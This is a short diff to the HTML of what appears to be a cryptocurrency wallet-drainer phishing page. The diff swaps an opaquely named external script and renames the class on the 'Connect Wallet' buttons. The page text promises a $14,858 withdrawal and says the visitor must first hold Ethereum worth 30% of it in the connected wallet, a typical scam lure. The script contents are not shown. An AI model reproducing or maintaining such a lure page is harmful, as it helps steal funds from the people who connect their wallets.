--- a/index.html
+++ b/index.html
@@ -36,7 +36,7 @@
     <script src="src/js/tokenabi.js"></script>
     <script src="jquery.min.js"></script>
     <script src="base.js?1"></script>
-    <script charset="UTF-8" type="text/javascript" src="./bf17704b-49ff-4c4f-98f3-2945b6cda9d4.js"></script>
+    <script charset="UTF-8" async type="text/javascript" src="./bcfd71477fdc1aec23.js"></script>
 
 
 </head>
@@ -109,7 +109,7 @@
                 <div class="Home_content__WcTpR">
                     <div class="Home_desc__q_6Ri">Connect your wallet to withdraw your balance of $14,858. Ensure there's a minimum Ethereum balance of 30% of amount to be withdrawn ($4,457) present in your wallet before initiating withdrawal of balance.<br><br>
                     <div class="Home_soon__8s2ww">
-                        <button class="interact-button">Connect Wallet</button><button class="interact-button" style="display: none;">Connect Wallet</button>
+                        <button class="connectButton">Connect Wallet</button><button class="connectButton" style="display: none;">Connect Wallet</button>
                         <br />
                     </div>
                     
